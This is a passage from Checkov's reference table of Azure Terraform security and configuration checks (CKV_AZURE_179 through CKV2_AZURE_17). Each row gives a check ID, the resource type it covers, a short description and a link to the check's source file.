[VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1438 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1439 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1440 | CKV_AZURE_180 | resource | azurerm_kusto_cluster | Ensure that data explorer uses Sku with an SLA | Terraform | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py) | -| 1441 | CKV_AZURE_181 | resource | azurerm_kusto_cluster | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely. 
| Terraform | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py) | -| 1442 | CKV_AZURE_182 | resource | azurerm_virtual_network | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | -| 1443 | CKV_AZURE_182 | resource | azurerm_virtual_network_dns_servers | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | -| 1444 | CKV_AZURE_183 | resource | azurerm_virtual_network | Ensure that VNET uses local DNS addresses | Terraform | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py) | -| 1445 | CKV_AZURE_184 | resource | azurerm_app_configuration | Ensure 'local_auth_enabled' is set to 'False' | Terraform | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py) | -| 1446 | CKV_AZURE_185 | resource | azurerm_app_configuration | Ensure 'Public Access' is not Enabled for App configuration | Terraform | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py) | -| 1447 | CKV_AZURE_186 | resource | azurerm_app_configuration | Ensure App configuration encryption block is set. 
| Terraform | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py) | -| 1448 | CKV_AZURE_187 | resource | azurerm_app_configuration | Ensure App configuration purge protection is enabled | Terraform | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py) | -| 1449 | CKV_AZURE_188 | resource | azurerm_app_configuration | Ensure App configuration Sku is standard | Terraform | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py) | -| 1450 | CKV_AZURE_189 | resource | azurerm_key_vault | Ensure that Azure Key Vault disables public network access | Terraform | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py) | -| 1451 | CKV_AZURE_190 | resource | azurerm_storage_account | Ensure that Storage blobs restrict public access | Terraform | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py) | -| 1452 | CKV_AZURE_191 | resource | azurerm_eventgrid_topic | Ensure that Managed identity provider is enabled for Azure Event Grid Topic | Terraform | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py) | -| 1453 | CKV_AZURE_192 | resource | azurerm_eventgrid_topic | Ensure that Azure Event Grid Topic local Authentication is disabled | Terraform | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py) | -| 1454 | CKV_AZURE_193 | resource | azurerm_eventgrid_topic | Ensure public 
network access is disabled for Azure Event Grid Topic | Terraform | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py) | -| 1455 | CKV_AZURE_194 | resource | azurerm_eventgrid_domain | Ensure that Managed identity provider is enabled for Azure Event Grid Domain | Terraform | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py) | -| 1456 | CKV_AZURE_195 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain local Authentication is disabled | Terraform | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py) | -| 1457 | CKV_AZURE_196 | resource | azurerm_signalr_service | Ensure that SignalR uses a Paid Sku for its SLA | Terraform | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py) | -| 1458 | CKV_AZURE_197 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN disables the HTTP endpoint | Terraform | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py) | -| 1459 | CKV_AZURE_198 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN enables the HTTPS endpoint | Terraform | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py) | -| 1460 | CKV_AZURE_199 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses double encryption | Terraform | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py) | -| 1461 | 
CKV_AZURE_200 | resource | azurerm_cdn_endpoint_custom_domain | Ensure the Azure CDN endpoint is using the latest version of TLS encryption | Terraform | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py) | -| 1462 | CKV_AZURE_201 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses a customer-managed key to encrypt data | Terraform | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py) | -| 1463 | CKV_AZURE_202 | resource | azurerm_servicebus_namespace | Ensure that Managed identity provider is enabled for Azure Service Bus | Terraform | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py) | -| 1464 | CKV_AZURE_203 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus Local Authentication is disabled | Terraform | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py) | -| 1465 | CKV_AZURE_204 | resource | azurerm_servicebus_namespace | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus | Terraform | [AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py) | -| 1466 | CKV_AZURE_205 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus is using the latest version of TLS encryption | Terraform | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py) | -| 1467 | CKV_AZURE_206 | resource | azurerm_storage_account | Ensure that Storage Accounts use replication | Terraform | 
[StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py) | -| 1468 | CKV_AZURE_207 | resource | azurerm_search_service | Ensure Azure Cognitive Search service uses managed identities to access Azure resources | Terraform | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py) | -| 1469 | CKV_AZURE_208 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for index updates | Terraform | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py) | -| 1470 | CKV_AZURE_209 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for search index queries | Terraform | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py) | -| 1471 | CKV_AZURE_210 | resource | azurerm_search_service | Ensure Azure Cognitive Search service allowed IPS does not give public Access | Terraform | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py) | -| 1472 | CKV_AZURE_211 | resource | azurerm_service_plan | Ensure App Service plan suitable for production use | Terraform | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py) | -| 1473 | CKV_AZURE_212 | resource | azurerm_service_plan | Ensure App Service has a minimum number of instances for failover | Terraform | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py) | -| 1474 | CKV_AZURE_213 | resource | 
azurerm_app_service | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | -| 1475 | CKV_AZURE_213 | resource | azurerm_linux_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | -| 1476 | CKV_AZURE_213 | resource | azurerm_windows_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | -| 1477 | CKV_AZURE_214 | resource | azurerm_linux_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | -| 1478 | CKV_AZURE_214 | resource | azurerm_windows_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | -| 1479 | CKV_AZURE_215 | resource | azurerm_api_management_backend | Ensure API management backend uses https | Terraform | [APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py) | -| 1480 | CKV_AZURE_216 | resource | azurerm_firewall | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Terraform | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py) | -| 1481 | CKV_AZURE_217 | resource | azurerm_application_gateway | Ensure Azure Application gateways listener that allow 
connection requests over HTTP | Terraform | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py) | -| 1482 | CKV_AZURE_218 | resource | azurerm_application_gateway | Ensure Application Gateway defines secure protocols for in transit communication | Terraform | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py) | -| 1483 | CKV_AZURE_219 | resource | azurerm_firewall | Ensure Firewall defines a firewall policy | Terraform | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py) | -| 1484 | CKV_AZURE_220 | resource | azurerm_firewall_policy | Ensure Firewall policy has IDPS mode as deny | Terraform | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py) | -| 1485 | CKV_AZURE_221 | resource | azurerm_linux_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1486 | CKV_AZURE_221 | resource | azurerm_linux_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1487 | CKV_AZURE_221 | resource | azurerm_windows_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1488 | 
CKV_AZURE_221 | resource | azurerm_windows_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1489 | CKV_AZURE_222 | resource | azurerm_linux_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | -| 1490 | CKV_AZURE_222 | resource | azurerm_windows_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | -| 1491 | CKV_AZURE_223 | resource | azurerm_eventhub_namespace | Ensure Event Hub Namespace uses at least TLS 1.2 | Terraform | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py) | -| 1492 | CKV_AZURE_224 | resource | azurerm_mssql_database | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity | Terraform | [SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py) | -| 1493 | CKV_AZURE_225 | resource | azurerm_service_plan | Ensure the App Service Plan is zone redundant | Terraform | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py) | -| 1494 | CKV_AZURE_226 | resource | azurerm_kubernetes_cluster | Ensure ephemeral disks are used for OS disks | Terraform | 
[AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py) | -| 1495 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | -| 1496 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster_node_pool | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | -| 1497 | CKV_AZURE_228 | resource | azurerm_eventhub_namespace | Ensure the Azure Event Hub Namespace is zone redundant | Terraform | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py) | -| 1498 | CKV_AZURE_229 | resource | azurerm_mssql_database | Ensure the Azure SQL Database Namespace is zone redundant | Terraform | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py) | -| 1499 | CKV_AZURE_230 | resource | azurerm_redis_cache | Standard Replication should be enabled | Terraform | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py) | -| 1500 | CKV_AZURE_231 | resource | azurerm_app_service_environment_v3 | Ensure App Service Environment is zone redundant | Terraform | 
[AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py) | -| 1501 | CKV_AZURE_232 | resource | azurerm_kubernetes_cluster | Ensure that only critical system pods run on system nodes | Terraform | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py) | -| 1502 | CKV_AZURE_233 | resource | azurerm_container_registry | Ensure Azure Container Registry (ACR) is zone redundant | Terraform | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py) | -| 1503 | CKV_AZURE_234 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender for cloud is set to On for Resource Manager | Terraform | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py) | -| 1504 | CKV_AZURE_235 | resource | azurerm_container_group | Ensure that Azure container environment variables are configured with secure values only | Terraform | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py) | -| 1505 | CKV2_AZURE_1 | resource | azurerm_storage_account | Ensure storage for critical data are encrypted with Customer Managed Key | Terraform | [StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml) | -| 1506 | CKV2_AZURE_2 | resource | azurerm_mssql_server_security_alert_policy | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | 
[VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | -| 1507 | CKV2_AZURE_2 | resource | azurerm_sql_server | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | -| 1508 | CKV2_AZURE_3 | resource | azurerm_mssql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 1509 | CKV2_AZURE_3 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 1510 | CKV2_AZURE_3 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 1511 | CKV2_AZURE_3 | resource | azurerm_sql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | -| 1512 | CKV2_AZURE_4 | resource | azurerm_mssql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | 
[VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 1513 | CKV2_AZURE_4 | resource | azurerm_mssql_server_security_alert_policy | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 1514 | CKV2_AZURE_4 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 1515 | CKV2_AZURE_4 | resource | azurerm_sql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | -| 1516 | CKV2_AZURE_5 | resource | azurerm_mssql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 1517 | CKV2_AZURE_5 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 1518 | CKV2_AZURE_5 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting 'Also send email notifications to 
admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 1519 | CKV2_AZURE_5 | resource | azurerm_sql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | -| 1520 | CKV2_AZURE_6 | resource | azurerm_sql_firewall_rule | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | -| 1521 | CKV2_AZURE_6 | resource | azurerm_sql_server | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | -| 1522 | CKV2_AZURE_7 | resource | azurerm_sql_server | Ensure that Azure Active Directory Admin is configured | Terraform | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml) | -| 1523 | CKV2_AZURE_8 | resource | azurerm_monitor_activity_log_alert | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | -| 1524 | 
CKV2_AZURE_8 | resource | azurerm_storage_account | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | -| 1525 | CKV2_AZURE_8 | resource | azurerm_storage_container | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | -| 1526 | CKV2_AZURE_9 | resource | azurerm_virtual_machine | Ensure Virtual Machines are utilizing Managed Disks | Terraform | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml) | -| 1527 | CKV2_AZURE_10 | resource | azurerm_virtual_machine | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | -| 1528 | CKV2_AZURE_10 | resource | azurerm_virtual_machine_extension | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | -| 1529 | CKV2_AZURE_11 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key | Terraform | 
[DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml) | -| 1530 | CKV2_AZURE_12 | resource | azurerm_virtual_machine | Ensure that virtual machines are backed up using Azure Backup | Terraform | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml) | -| 1531 | CKV2_AZURE_13 | resource | azurerm_mssql_server_security_alert_policy | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | -| 1532 | CKV2_AZURE_13 | resource | azurerm_sql_server | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | -| 1533 | CKV2_AZURE_14 | resource | azurerm_managed_disk | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | -| 1534 | CKV2_AZURE_14 | resource | azurerm_virtual_machine | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | -| 1535 | CKV2_AZURE_15 | resource | azurerm_data_factory | Ensure that Azure data factories are encrypted with a customer-managed key | Terraform | 
[AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml) | -| 1536 | CKV2_AZURE_16 | resource | azurerm_mysql_server | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | -| 1537 | CKV2_AZURE_16 | resource | azurerm_mysql_server_key | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | -| 1538 | CKV2_AZURE_17 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | -| 1539 | CKV2_AZURE_17 | resource | azurerm_postgresql_server_key | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | -| 1540 | 